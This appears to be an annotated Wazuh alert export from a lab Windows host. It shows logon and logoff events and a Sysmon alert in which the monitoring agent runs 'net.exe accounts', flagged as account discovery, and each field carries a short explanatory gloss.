data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys can indicate downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x25f285d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.476639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3513964Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43764 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F285D
Linked Logon ID: 0x25F1ED7
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f285d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys can indicate downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x25f1ed7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.484358 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3563661Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43766 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10720 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F285D
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f285d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.486825 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3658372Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43767 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F1ED7
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f1ed7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.489292 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:20.5246392Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43772 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys can indicate downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.496628 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:24.4863616Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43774 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533929.503964 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:36:57.1322035Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212225 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION Text severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:36:57.031
ProcessGuid: {94294ddc-2e29-6801-dd07-000000000e00}
ProcessId: 14844
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:36:57.031 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e29-6801-dd07-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
